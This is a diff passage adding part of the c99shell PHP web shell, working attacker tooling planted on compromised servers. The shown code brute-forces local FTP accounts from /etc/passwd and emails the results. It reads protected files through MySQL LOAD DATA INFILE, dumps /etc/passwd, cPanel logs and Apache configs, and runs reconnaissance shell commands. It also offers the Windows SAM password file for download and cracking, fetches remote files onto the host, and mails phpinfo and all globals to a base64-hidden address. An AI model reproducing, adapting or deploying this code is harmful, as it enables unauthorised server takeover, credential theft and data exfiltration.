+      echo "<option value=\"tblcheck\">Check table</option>"; 
+      echo "<option value=\"tbloptimize\">Optimize table</option>"; 
+      echo "<option value=\"tblrepair\">Repair table</option>"; 
+      echo "<option value=\"tblanalyze\">Analyze table</option>"; 
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>"; 
+      mysql_free_result($result); 
+     } 
+    } 
+   } 
+   } 
+  } 
+  else 
+  { 
+   $acts = array("","newdb","serverstatus","servervars","processes","getfile"); 
+   if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php } 
+   if (!empty($sql_act)) 
+   { 
+    echo "<hr size=\"1\" noshade>"; 
+    if ($sql_act == "newdb") 
+    { 
+     echo "<b>"; 
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";} 
+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} 
+    } 
+    if ($sql_act == "serverstatus") 
+    { 
+     $result = mysql_query("SHOW STATUS", $sql_sock); 
+     echo "<center><b>Server-status variables:</b><br><br>"; 
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; 
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
+     echo "</table></center>"; 
+     mysql_free_result($result); 
+    } 
+    if ($sql_act == "servervars") 
+    { 
+     $result = mysql_query("SHOW VARIABLES", $sql_sock); 
+     echo "<center><b>Server variables:</b><br><br>"; 
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; 
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
+     echo "</table>"; 
+     mysql_free_result($result); 
+    } 
+    if ($sql_act == "processes") 
+    { 
+     if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";} 
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock); 
+     echo "<center><b>Processes:</b><br><br>"; 
+     echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>"; 
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";} 
+     echo "</table>"; 
+     mysql_free_result($result); 
+    } 
+    if ($sql_act == "getfile") 
+    { 
+     $tmpdb = $sql_login."_tmpdb"; 
+     $select = mysql_select_db($tmpdb); 
+     if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} 
+     if ($select) 
+     { 
+      $created = FALSE; 
+      mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); 
+      mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); 
+      $result = mysql_query("SELECT * FROM tmp_file;"); 
+      if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";} 
+      else 
+      { 
+       for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);} 
+       $f = ""; 
+       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);} 
+       if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";} 
+       else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";} 
+       mysql_free_result($result); 
+       mysql_query("DROP TABLE tmp_file;"); 
+      } 
+     } 
+     mysql_drop_db($tmpdb); //comment it if you want to leave database 
+    } 
+   } 
+  } 
+ } 
+ echo "</td></tr></table>"; 
+ if ($sql_sock) 
+ { 
+  $affected = @mysql_affected_rows($sql_sock); 
+  if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} 
+  echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>"; 
+ } 
+ echo "</table>"; 
+} 
+if ($act == "mkdir") 
+{ 
+ if ($mkdir != $d) 
+ { 
+  if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} 
+  elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";} 
+  echo "<br><br>"; 
+ } 
+ $act = $dspact = "ls"; 
+} 
+if ($act == "ftpquickbrute") 
+{ 
+ echo "<b>Ftp Quick brute:</b><br>"; 
+ if (!win) {echo "This functions not work in Windows!<br><br>";} 
+ else 
+ { 
+  function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) 
+  { 
+   if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));} 
+   else {$TRUE = TRUE;} 
+   if ($TRUE) 
+   { 
+    $sock = @ftp_connect($host,$port,$timeout); 
+    if (@ftp_login($sock,$login,$pass)) 
+    { 
+     echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>"; 
+     ob_flush(); 
+     return TRUE; 
+    } 
+   } 
+  } 
+  if (!empty($submit)) 
+  { 
+   if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} 
+   $fp = fopen("/etc/passwd","r"); 
+   if (!$fp) {echo "Can't get /etc/passwd for password-list.";} 
+   else 
+   { 
+    if ($fqb_logging) 
+    { 
+     if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} 
+     else {$fqb_logfp = FALSE;} 
+     $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; 
+     if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} 
+    } 
+    ob_flush(); 
+    $i = $success = 0; 
+    $ftpquick_st = getmicrotime(); 
+    while(!feof($fp)) 
+    { 
+     $str = explode(":",fgets($fp,2048)); 
+     if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) 
+     { 
+      echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>"; 
+      $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; 
+      if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} 
+      $success++; 
+      ob_flush(); 
+     } 
+     if ($i > $fqb_lenght) {break;} 
+     $i++; 
+    } 
+    if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";} 
+    $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); 
+    echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>"; 
+    $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; 
+    if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} 
+    if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);} 
+    fclose($fqb_logfp); 
+   } 
+  } 
+  else 
+  { 
+   $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; 
+   $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); 
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>"; 
+  } 
+ } 
+} 
+if ($act == "d") 
+{ 
+ if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";} 
+ else 
+ { 
+  echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>"; 
+  if (!$win) 
+  { 
+   echo "<tr><td><b>Owner/Group</b></td><td> "; 
+   $ow = posix_getpwuid(fileowner($d)); 
+   $gr = posix_getgrgid(filegroup($d)); 
+   $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); 
+  } 
+  echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>"; 
+ } 
+} 
+if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();} 
+if ($act == "security") 
+{ 
+ echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>"; 
+ if (!$win) 
+ { 
+  if ($nixpasswd) 
+  { 
+   if ($nixpasswd == 1) {$nixpasswd = 0;} 
+   echo "<b>*nix /etc/passwd:</b><br>"; 
+   if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} 
+   if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} 
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>"; 
+   $i = $nixpwd_s; 
+   while ($i < $nixpwd_e) 
+   { 
+    $uid = posix_getpwuid($i); 
+    if ($uid) 
+    { 
+     $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>"; 
+     echo join(":",$uid)."<br>"; 
+    } 
+    $i++; 
+   } 
+  } 
+  else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";} 
+ } 
+ else 
+ { 
+  $v = $_SERVER["WINDIR"]."\repair\sam"; 
+  if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";} 
+  else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";} 
+ } 
+ if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";} 
+ if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";} 
+ if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} 
+ if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} 
+ if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";} 
+ if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";} 
+ if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";} 
+ function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}} 
+ displaysecinfo("OS Version?",myshellexec("cat /proc/version")); 
+ displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version")); 
+ displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net")); 
+ displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise")); 
+ displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo")); 
+ displaysecinfo("RAM",myshellexec("free -m")); 
+ displaysecinfo("HDD space",myshellexec("df -h")); 
+ displaysecinfo("List of Attributes",myshellexec("lsattr -a")); 
+ displaysecinfo("Mount options ",myshellexec("cat /etc/fstab")); 
+ displaysecinfo("Is cURL installed?",myshellexec("which curl")); 
+ displaysecinfo("Is lynx installed?",myshellexec("which lynx")); 
+ displaysecinfo("Is links installed?",myshellexec("which links")); 
+ displaysecinfo("Is fetch installed?",myshellexec("which fetch")); 
+ displaysecinfo("Is GET installed?",myshellexec("which GET")); 
+ displaysecinfo("Is perl installed?",myshellexec("which perl")); 
+ displaysecinfo("Where is apache",myshellexec("whereis apache")); 
+ displaysecinfo("Where is perl?",myshellexec("whereis perl")); 
+ displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf")); 
+ displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf")); 
+ displaysecinfo("locate my.conf",myshellexec("locate my.conf")); 
+ displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf")); 
+} 
+if ($act == "mkfile") 
+{ 
+ if ($mkfile != $d) 
+ { 
+  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";} 
+  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";} 
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} 
+ } 
+ else {$act = $dspact = "ls";} 
+} 
+if ($act == "encoder") 
+{ 
+ echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>"; 
+ foreach(array("md5","crypt","sha1","crc32") as $v) 
+ { 
+  echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>"; 
+ } 
+ echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly> 
+ <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly> 
+ <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>"; 
+ echo "<center>base64_decode - "; 
+ if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";} 
+ else 
+ { 
+  $debase64 = base64_decode($encoder_input); 
+  $debase64 = str_replace("\0","[0]",$debase64); 
+  $a = explode("\r\n",$debase64); 
+  $rows = count($a); 
+  $debase64 = htmlspecialchars($debase64); 
+  if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";} 
+  else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";} 
+  echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>"; 
+ } 
+ echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\""; 
+ $c = strlen($encoder_input); 
+ for($i=0;$i<$c;$i++) 
+ { 
+  $hex = dechex(ord($encoder_input[$i])); 
+  if ($encoder_input[$i] == "&") {echo $encoder_input[$i];} 
+  elseif ($encoder_input[$i] != "\\") {echo "%".$hex;} 
+ } 
+ echo "\" readonly><br></center></form>"; 
+} 
+if ($act == "fsbuff") 
+{ 
+ $arr_copy = $sess_data["copy"]; 
+ $arr_cut = $sess_data["cut"]; 
+ $arr = array_merge($arr_copy,$arr_cut); 
+ if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";} 
+ else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";} 
+} 
+if ($act == "selfremove") 
+{ 
+ if (($submit == $rndcode) and ($submit != "")) 
+ { 
+  if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; c99shexit(); } 
+  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";} 
+ } 
+ else 
+ { 
+  if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";} 
+  $rnd = rand(0,9).rand(0,9).rand(0,9); 
+  echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>"; 
+ } 
+} 
+if ($act == "update") {$ret = c99sh_getupdate(!!$confirmupdate); echo "<b>".$ret."</b>"; if (stristr($ret,"new version")) {echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";}} 
+if ($act == "feedback") 
+{ 
+ $suppmail = base64_decode("Yzk5c2hlbGxAY2N0ZWFtLnJ1"); 
+ if (!empty($submit)) 
+ { 
+  $ticket = substr(md5(microtime()+rand(1,1000)),0,6); 
+  $body = "c99shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR; 
+  if (!empty($fdbk_ref)) 
+  { 
+   $tmp = @ob_get_contents(); 
+   ob_clean(); 
+   phpinfo(); 
+   $phpinfo = base64_encode(ob_get_contents()); 
+   ob_clean(); 
+   echo $tmp; 
+   $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n"; 
+  } 
+  mail($suppmail,"c99shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail); 
+  echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>"; 
+ } 
+ else {echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=feedback><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: English, Russian.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";} 
+} 
+if ($act == "search") 
+{ 
+ echo "<b>Search in file-system:</b><br>"; 
+ if (empty($search_in)) {$search_in = $d;} 
+ if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} 
+ if (empty($search_text_wwo)) {$search_text_regexp = 0;} 
+ if (!empty($submit)) 
+ { 
+  $found = array(); 
+  $found_d = 0; 
+  $found_f = 0; 
+  $search_i_f = 0; 
+  $search_i_d = 0; 
+  $a = array 
+  ( 
+   "name"=>$search_name, "name_regexp"=>$search_name_regexp, 
+   "text"=>$search_text, "text_regexp"=>$search_text_regxp, 
+   "text_wwo"=>$search_text_wwo, 
+   "text_cs"=>$search_text_cs, 
+   "text_not"=>$search_text_not 
+  ); 
+  $searchtime = getmicrotime(); 
+  $in = array_unique(explode(";",$search_in)); 
+  foreach($in as $v) {c99fsearch($v);} 
+  $searchtime = round(getmicrotime()-$searchtime,4); 
+  if (count($found) == 0) {echo "<b>No files found!</b>";} 
+  else 
+  { 
+   $ls_arr = $found; 
+   $disp_fullpath = TRUE; 
+   $act = "ls"; 
+  } 
+ } 
+ echo "<form method=POST> 
+<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\"> 
+<b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp 
+<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\"> 
+<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea> 
+<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp 
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only 
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive 
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text 
+<br><br><input type=submit name=submit value=\"Search\"></form>"; 
+ if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";} 
+} 
+if ($act == "chmod") 
+{ 
+ $mode = fileperms($d.$f); 
+ if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";} 
+ else 
+ { 
+  $form = TRUE; 
+  if ($chmod_submit) 
+  { 
+   $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); 
+   if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";} 
+   else {$err = "Can't chmod to ".$octet.".";} 
+  } 
+  if ($form) 
+  { 
+   $perms = parse_perms($mode); 
+   echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>"; 
+  } 
+ } 
+} 
+if ($act == "upload") 
+{ 
+ $uploadmess = ""; 
+ $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); 
+ if (empty($uploadpath)) {$uploadpath = $d;} 
+ elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} 
+ if (!empty($submit)) 
+ { 
+  global $HTTP_POST_FILES; 
+  $uploadfile = $HTTP_POST_FILES["uploadfile"]; 
+  if (!empty($uploadfile["tmp_name"])) 
+  { 
+   if (empty($uploadfilename)) {$destin = $uploadfile["name"];} 
+   else {$destin = $userfilename;} 
+   if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";} 
+  } 
+  elseif (!empty($uploadurl)) 
+  { 
+   if (!empty($uploadfilename)) {$destin = $uploadfilename;} 
+   else 
+   { 
+    $destin = explode("/",$destin); 
+    $destin = $destin[count($destin)-1]; 
+    if (empty($destin)) 
+    { 
+     $i = 0; 
+     $b = ""; 
+     while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} 
+   } 
+   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";} 
+   else 
+   { 
+    $st = getmicrotime(); 
+    $content = @file_get_contents($uploadurl); 
+    $dt = round(getmicrotime()-$st,4); 
+    if (!$content) {$uploadmess .=  "Can't download file!<br>";} 
+    else 
